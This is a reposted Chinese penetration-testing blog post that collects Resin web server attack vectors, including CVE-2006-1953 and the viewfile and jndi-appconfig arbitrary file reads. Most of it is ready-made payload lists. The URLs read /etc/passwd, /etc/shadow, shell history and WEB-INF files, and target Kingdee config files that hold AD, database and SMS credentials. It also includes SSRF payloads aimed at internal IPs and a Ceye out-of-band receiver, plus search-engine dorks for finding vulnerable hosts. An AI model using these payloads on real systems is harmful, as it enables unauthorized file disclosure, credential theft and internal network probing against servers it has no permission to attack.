转载http://blkstone.github.io/2017/10/30/resin-attack-vectors/#:~:text=Resin%20for%20Windows%E5%AE%9E%E7%8E%B0%E4%B8%8A%E5%AD%98%E5%9C%A8%E5%A4%9A%E4%B8%AA%E6%BC%8F%E6%B4%9E%EF%BC%8C%E8%BF%9C%E7%A8%8B%E6%94%BB%E5%87%BB%E8%80%85%E5%8F%AF%E8%83%BD%E5%88%A9%E7%94%A8%E6%AD%A4%E6%BC%8F%E6%B4%9E%E9%9D%9E%E6%8E%88%E6%9D%83%E8%8E%B7%E5%8F%96%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E3%80%82%20Resin%20%E6%B2%A1%E6%9C%89%E6%AD%A3%E7%A1%AE%E8%BF%87%E6%BB%A4%E9%80%9A%E8%BF%87URL%E4%BC%A0%E9%80%81%E7%9A%84%E8%BE%93%E5%85%A5%EF%BC%8C%E5%85%81%E8%AE%B8%E8%BF%9C%E7%A8%8B%E6%94%BB%E5%87%BB%E8%80%85%E9%80%9A%E8%BF%87%E5%9C%A8URL%E4%B8%AD%E6%8F%90%E4%BE%9B%E6%9C%89%E4%BB%BB%E6%84%8F%E6%89%A9%E5%B1%95%E5%90%8D%E7%9A%84,DOS%20%E8%AE%BE%E5%A4%87%E6%96%87%E4%BB%B6%E5%90%8D%E4%BB%8E%E7%B3%BB%E7%BB%9F%E4%B8%8A%E7%9A%84%E4%BB%BB%E6%84%8F%20COM%20%E6%88%96%20LPT%E8%AE%BE%E5%A4%87%E8%AF%BB%E5%8F%96%E8%BF%9E%E7%BB%AD%E7%9A%84%E6%95%B0%E6%8D%AE%E6%B5%81%E3%80%81%E9%80%9A%E8%BF%87%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%94%BB%E5%87%BB%E6%B3%84%E9%9C%B2Web%E5%BA%94%E7%94%A8%E7%9A%84WEB-INF%E7%9B%AE%E5%BD%95%E4%B8%AD%E7%9A%84%E6%96%87%E4%BB%B6%E5%86%85%E5%AE%B9%EF%BC%8C%E6%88%96%E9%80%9A%E8%BF%87%E5%8C%85%E5%90%AB%E6%9C%89%E7%89%B9%E6%AE%8A%E5%AD%97%E7%AC%A6%E7%9A%84URL%E6%B3%84%E9%9C%B2%E5%88%B0Caucho%20Resin%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A%84%E5%AE%8C%E6%95%B4%E7%B3%BB%E7%BB%9F%E8%B7%AF%E5%BE%84%E3%80%82
0x01 CVE-2006-1953 Resin Windows远程目录遍历漏洞
参考资料
https://www.rapid7.com/resources/advisories/R7-0024.jsp http://www.nsfocus.net/vulndb/8829
影响范围
受影响系统: Caucho Technology Resin v3.0.18 for Windows Caucho Technology Resin v3.0.17 for Windows
测试代码
1
2
3
4
http:
//victim.com
/C:%5C/
http:
//victim.com
/D:%5C/
http:
//victim.com
/E:%5C/
http:
//victim.com
/F:%5C/
0x02 Resin %20任意文件读取
http://webscan.360.cn/vul/view/vulid/3528
Resin Windows 漏洞
漏洞描述
Resin for Windows实现上存在多个漏洞,远程攻击者可能利用此漏洞非授权获取敏感信息。 Resin 没有正确过滤通过URL传送的输入,允许远程攻击者通过在URL中提供有任意扩展名的 DOS 设备文件名从系统上的任意 COM 或 LPT设备读取连续的数据流、通过目录遍历攻击泄露Web应用的WEB-INF目录中的文件内容,或通过包含有特殊字符的URL泄露到Caucho Resin服务器的完整系统路径。
影响范围
1
2
3
4
5
6
7
8
9
10
11
Caucho
Resin
Professional
v3
.1
.0
for
Windows
Caucho
Resin
v3
.1
.0
for
Windows
Caucho
Resin
v3
.0
.21
for
Windows
Caucho
Resin
v3
.0
.20
for
Windows
Caucho
Resin
v3
.0
.19
for
Windows
Caucho
Resin
v3
.0
.18
for
Windows
Caucho
Resin
v3
.0
.17
for
Windows
KNOWN
FIXED:
Caucho
Resin
v3
.1
.1
for
Windows
Caucho
Resin
Professional
v3
.1
.1
for
Windows
测试代码
1
2
3
4
http://www.example.com:8080/[
path]/[device].[extension]
http://www.example.com:8080/%20../web-inf
http://www.example.com:8080/%20
http://www.example.com:8080/[
path]/%20.xtp
漏洞危害
通过此漏洞可以读取到串口设备的信息以及网站任意目录的文件遍历。
略,之后补充payloads
1
2
3
4
5
6
7
8
9
10
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/etc/hosts
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/etc/passwd
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/etc/shadow
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/opt
/nginx/conf/nginx.conf
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/etc
/sysconfig/network-scripts/ifcfg-eth1
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=~/.bashrc_history
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/root/.bashrc_history
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/opt
/www/nagios
/WEB-INF/nagios.conf
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/opt
/nagios/etc/hostgroup.cfg
/resin-doc/resource
/tutorial/jndi-appconfig
/test?inputFile=/etc/passwd
0x04 Resin viewfile 任意文件读取
略,之后补充payloads
1
2
3
4
5
6
7
/resin-doc/viewfile/?
file=index.jsp
/resin-doc/viewfile/?
file=config.xml
/resin-doc/viewfile/?
file=WEB-INF/web.xml
/resin-doc/viewfile/?
file=WEB-INF/resin-web.xml
/resin-doc/viewfile/?
file=css/default.css
/resin-doc/viewfile/?
file=examples/amber-session/WEB-INF/classes/example/User.java
/resin-doc/viewfile/?
file=images/hbleed.gif
0x10 Payloads
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
/usr/local
/resin/conf/resin.conf
# 基类Payload
/resin-doc/viewfile/?file=/WEB-INF/web.xml
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/hosts
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)/内网IP
/%
20../WEB-INF/
# 弱口令
/resin-admin/status.php
# 衍生Payload
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/hosts
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/passwd
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/shadow
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/opt/nginx
/conf/nginx.conf
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/sysconfig
/network-scripts/ifcfg-eth1
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=~/.bashrc_history
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/root/.bashrc_history
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/opt/www
/nagios/WEB-INF/nagios.conf
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/opt/nagios
/etc/hostgroup.cfg
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=
/etc/passwd
/resin-doc/viewfile/?file=/WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=/
&servletpath=
&file=fakefile.xml
/resin-doc/viewfile/?contextpath=/
&servletpath=
&file=
/etc/hosts
/resin-doc/viewfile/?contextpath=/
&servletpath=
&file=
/etc/shadow
/resin-doc/viewfile/?contextpath=/otherwebapp
&servletpath=
&file=WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=./
&servletpath=
&file=WEB-INF/web.xml
/resin-doc/viewfile/?contextpath=C:\
&servletpath=
&file=boot.ini
/resin-doc/viewfile/?file=index.jsp
/resin-doc/examples
/ioc-periodictask/viewfile?file=index.xtp
/resin-doc/examples
/jndi-appconfig/test?inputFile=C:\Windows\system.ini
# 针对金蝶的payload
/kingdee/%
20..
/web-inf/
/kingdee/%
20..
/editor/
/kingdee/%
20..
/disk/
# AD域服务器帐号密码(可能未配置)
/kingdee/%
20..
/web-inf/classes/ad_config.conf
# ctop数据库帐号密码
/kingdee/%
20..
/web-inf/classes/ctop.conf
# 短信网关
/kingdee/%
20..
/web-inf/classes/sms_config.conf
# 金蝶变形
/ctop/%
20..
/web-inf/
# 潜在的绕过
/%
20..
/web-inf/
/%
20../WEB-INF/
# 潜在的SSRF
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=http:
//10.0.201.75
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=https:
//www.secpulse.com/robots.txt
/resin-doc/resource
/tutorial/jndi-appconfig/test?inputFile=远端服务器(Ceye)
# CVE-2006-1953
/A:%
5C/
/B:%
5C/
/C:%
5C/
/D:%
5C/
/E:%
5C/
/F:%
5C/
/G:%
5C/
/H:%
5C/
0x11案例
主要流行时间 15年6月-15年12月
https://web.archive.org/web/20130915134701/https://www.rapid7.com/resources/advisories/R7-0028.jsp https://www.rapid7.com/resources/advisories/R7-0028.jsp https://www.rapid7.com/resources/advisories/R7-0029.jsp https://www.rapid7.com/resources/advisories/R7-0030.jsp
a. %20 任意文件读取
Resin漏洞利用案例之目录遍历/以金蝶某系统为例https://www.secpulse.com/archives/39144.html
中国人寿某站存在resin目录遍历漏洞导致内部多数据库信息泄露https://www.secpulse.com/archives/41485.html
和讯网某分站resin任意文件读取附赠xss一枚https://www.secpulse.com/archives/37175.html
和讯网某站点任意文件读取和SSRF漏洞https://www.secpulse.com/archives/34659.html
21CN某站点站点任意文件读取和SSRF漏洞可探测内网(resin成功利用案例)https://www.secpulse.com/archives/40166.html
c. viewfile 任意文件读取
58同城漏洞大集合(任意上传,Resin远程文件等)https://www.secpulse.com/archives/15056.html
百合网从Resin文件读取到webshellhttps://www.secpulse.com/archives/14755.html
爱奇艺Resin配置漏洞https://www.secpulse.com/archives/13485.html
搜狐网Resin配置漏洞,导致敏感信息泄露https://www.secpulse.com/archives/12074.html
南方电网国际resin任意文件读取https://www.secpulse.com/archives/9536.html
d. CVE-2006-1953 Resin Windows远程目录遍历漏洞
Resin漏洞利用案例之Windows全盘遍历漏洞(以某省戒毒所为例)https://www.secpulse.com/archives/37313.html
万户OA 万户网络Resin版本过低导致客户网站磁盘信息泄露https://www.secpulse.com/archives/30621.html
万户网络技建站使用中间件Resin版本过低导致众多客户网站磁盘信息泄露https://www.secpulse.com/archives/20697.html
e. 弱口令
人人网多个Resin弱口令https://www.secpulse.com/archives/29247.html
17173两个站点Resin存在弱口令https://www.secpulse.com/archives/24364.html
0x12 自动化目标方案
1
2
3
inurl:jndi-appconfig/test
Shadon
FOFA/Zoomeye
0x13 补充
Ceye HTTP盲攻击接收/可视化 可以参考 Cplushua(宫华) 的 HTTP 盲攻击 (Freebuf公开课) 这里的盲攻击指的是无回显的攻击。
http://ceye.io/record/index https://sso.telnet404.com/cas/login?service=http%3A%2F%2Fceye.io%2Flogin%2F
</div>
<div class="post-footer">
<div class="post-tags">
<a href="/tags/渗透测试/"> #渗透测试 </a>
<a href="/tags/Red-Team/"> #Red Team </a>
</div>
<div class="post-nav">
<div class="post-nav-prev post-nav-item">
<a href="/2017/10/30/rat-history/">1989 至 2017 长达29年的 RAT 编年史</a>
</div>
<div class="post-nav-next post-nav-item">
<a href="/2017/10/30/ssl-ccs-injection/">CVE-2014-0224 SSL/TLS中间人攻击漏洞(CCS注入)</a>
</div>
</div>
</div>